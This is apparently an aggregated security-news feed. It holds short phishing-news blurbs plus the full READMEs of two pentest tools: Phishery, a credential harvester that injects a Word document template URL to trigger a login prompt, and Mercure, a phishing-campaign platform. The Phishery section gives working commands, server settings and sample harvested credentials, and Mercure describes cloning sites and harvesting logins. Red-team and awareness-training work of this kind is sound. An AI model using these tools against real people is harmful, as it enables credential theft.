Evasion Techniques in Phishing Attacks

We all know that we shouldn’t click on links from sketchy looking emails. But what if the website you’re viewing takes you to a spoofed page at the Apple ID store and asks for your login information to proceed? This tactic is called phishing, and attacks are exponentially on the rise.
Used by hackers to encourage unsuspecting victims to hand over their data, these deceptive email campaigns, SMS alerts, and fake websites are often designed to look and sound authentic.
Continue reading Evasion Techniques in Phishing Attacks at Sucuri Blog.

Link: http://feedproxy.google.com/~r/sucuri/blog/~3/Kjg3VRuvFIs/evasion-techniques-phishing-attacks.html

Phishery – An SSL Enabled Basic Auth Credential Harvester with a Word Document Template URL Injector

Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.The power of phishery is best demonstrated by setting a Word document’s template to a phishery URL. This causes Microsoft Word to make a request to the URL, resulting in an Authentication Dialog being shown to the end-user. The ability to inject any .docx file with a URL is possible using phishery’s -i [in docx], -o [out docx], and -u [url] options.DownloadOperating system specific packages can be downloaded from here.InstallExtract the archive, and optionally, install binary to $PATH$ tar -xzvf phishery*.tar.gz$ cd phishery*$ cp phishery /usr/local/binUsage$ phishery –help|\ \\\\__ O __ _ __| \_/ o \ o ____ / /_ (_)____/ /_ ___ _______ __> _ (( <_ oO / __ \/ __ \/ / ___/ __ \/ _ \/ ___/ / / /| / \__+___/ / /_/ / / / / (__ ) / / / __/ / / /_/ /|/ |/ / .___/_/ /_/_/____/_/ /_/\___/_/ \__, / /_/ Basic Auth Credential Harvester (____/ with Word Doc Template Injector Start the server : phishery -s settings.json -c credentials.json Inject a template : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx Options: -h, --help Show usage and exit. -v Show version and exit. -s The JSON settings file used to setup the server. [default: "settings.json"] -c The JSON file to store harvested credentials. [default: "credentials.json"] -u The phishery URL to use as the Word document template. -i The Word .docx file to inject with a template URL. -o The new Word .docx file with the injected template URL.Running the serverModify the provided settings.json file as needed, by default it should look like this:{ "ip": "0.0.0.0", "port": "443", "sslCert": "server.crt", "sslKey": "server.key", "basicRealm": "Secure Document Gateway", "responseStatus": 200, "responseFile": "template.dotx", "responseHeaders": [ ["Content-Type", "application/vnd.openxmlformats-officedocument.wordprocessingml.template"] ]}This setup will start the HTTP server on Port 443 with SSL configured to use server.crt and server.key. The basic authentication realm is set to Secure Document Gateway. When any credentials are provided, a 200 response status is sent along with the contents of the included template.dotx and the content type header: Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.template.The settings file may also be configured to output a simple body, by using responseBody, like this:{ "ip": "0.0.0.0", "port": "443", "sslCert": "server.crt", "sslKey": "server.key", "basicRealm": "Secure Document Gateway", "responseStatus": 404, "responseBody": "<h1>Not Found</h1>", "responseHeaders": [ ["Content-Type", "text/html"] ]}The effectiveness of this tool is based mostly on the Domain and Basic Auth Realm used, as that is often all the end user will see when triggered from an Office document. Make sure to point your DNS A Records the public IP of the phishery server.It’s recommended that the provided cert is replaced with a trusted one, such as one generated with LetsEncrypt. Microsoft Word on OS X will prevent the auth dialog if the cert is invalid, and Microsoft Word on Windows will prompt the user to accept the invalid certificate.Once the server is configured and running, all you need to do is embed a phishery URL in a document, or anywhere else your heart desires. phishery does give you the ability to inject your URL into a Word document as a template, instructions on how to do this can be found below.Injecting a Word DocumentTo inject a Word document with a template URL, you’ll need a .docx file and the phishery server URL.Now run phishery with your document and URL:$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx[+] Opening Word document: good.docx[+] Setting Word document template to: https://secure.site.local/docs[+] Saving injected Word document to: bad.docx[*] Injected Word document has been saved!Make sure your phishery server is running and available at the URL you used. Now when the Word document is opened, the victim will be prompted with an authentication dialog.Now when the victim opens the document, you’ll see the following:$ ./phishery[+] Credential store initialized at: credentials.json[+] Starting HTTPS Auth Server on: 0.0.0.0:443[*] Request Received at 2016-09-25 01:06:28: HEAD https://secure.site.local/docs[*] Sending Basic Auth response to: 127.0.0.1[*] New credentials harvested![HTTP] Host : secure.example.local[HTTP] Request : /docs[HTTP] User Agent : Microsoft Office Word[HTTP] IP Address : 127.0.0.1[AUTH] Username : john.doe[AUTH] Password : Summer15Download Phishery

Link: http://feedproxy.google.com/~r/PentestTools/~3/8yZkOBfr-eM/phishery-ssl-enabled-basic-auth.html

Tech Support Scammers Cast a Wider Net

Microsoft is warning of a wave of phishing campaigns pushing tech support scams via malicious links to phony Amazon, Alibaba and LinkedIn web pages.

Link: https://threatpost.com/tech-support-scammers-cast-a-wider-net/127254/

Mercure – A Tool For Security Managers Who Want To Train Their Colleague To Phishing

Mercure is a tool for security managers who want to teach their colleagues about phishing.What Mercure can do:Create email templatesCreate target listsCreate landing pagesHandle attachmentsLet you keep track in the Campaign dashboardTrack email reads, landing page visits and attachment execution.Harvest credentialsWhat Mercure will do:Display more graphs (we like graphs!)Provide a REST APIAllow for multi-message campaigns (aka scenarios)Check browser pluginsUser trainingDocker QuickstartRequirementsdockerAvailable configuration Environment variable name Status Description Value example SECRET_KEY Required Django secret key Random string URL Required Mercure URL https://mercure.example.com EMAIL_HOST Required SMTP server mail.example.com EMAIL_PORT Optional SMTP port 587 EMAIL_HOST_USER Optional SMTP user [email protected] EMAIL_HOST_PASSWORD Optional SMTP password [email protected] DEBUG Optional Run on debug mode True SENTRY_DSN Optional Send debug info to sentry.io https://23xxx:[email protected]/1234 AXES_LOCK_OUT_AT_FAILURE Optional Ban on forcebrute login True AXES_COOLOFF_TIME Optional Ban duration on forcebrute login (in hours) 0.8333 DONT_SERVES_STATIC_FILE Optional Don’t serve static files with django True Sample deployment# create containerdocker run \ -d \ –name=mercure \ -e SECRET_KEY=$(cat /dev/urandom | tr -dc ‘a-zA-Z0-9’ | fold -w 200 | head -n 1) \ -e URL=https://mercure.example.com \ -e EMAIL_HOST=mail.example.com \ -e EMAIL_PORT=587 \ -e [email protected] \ -e [email protected] \ synhackfr/mercure# create super userdocker exec -it mercure python manage.py createsuperuserGit QuickstartRequirementspython3pipDeploymentgit clone [email protected]:synhack/mercure.git && cd mercurepip install -r requirements.txt./manage.py makemigrations./manage.py migrate./manage.py collectstatic./manage.py createsuperuser./manage.py runserverHow to use mercureWe can consider mercure is divide between 4 categories :TargetsEmail TemplatesAttachments and landing pageCampaignsTargets, Email Templates and Campaign are the minimum required to run a basic phishing campaign.First, add your targets You need to fill mercure name, the target email.Target first and last name are optional, but can be usefull to the landing page Then, fill the email template. You need to fill the mercure name, the subject, the send and the email content. To improve the email quality, you have to fill the email content HTML and the text content. To get information about opened email, check “Add open email tracker" You can be helped with "Variables" category.Attachments and landing page are optionnal, we will see it after. Finally, launch the campaign You need to fill the mercure name, select the email template and the target group. You can select the SMTP credentials, SSL using or URL minimazing Optional, add landing pageYou need to fill the mercure name, the domain to use You can use "Import from URL" to copy an existing website.You have to fill the page content with text and HTML content by clicking to "Source" Optional, add Attachment You need to fill the mercure name, the file name which appears in the email and the file You also have to check if the the file is buildable or not, if you need to compute a file for example.To execute the build , you need to create a zip archive which contain a build script (named ‘generator.sh’ and a buildable fileDownload Mercure

Link: http://feedproxy.google.com/~r/PentestTools/~3/IjeYz-dxL7g/mercure-tool-for-security-managers-who.html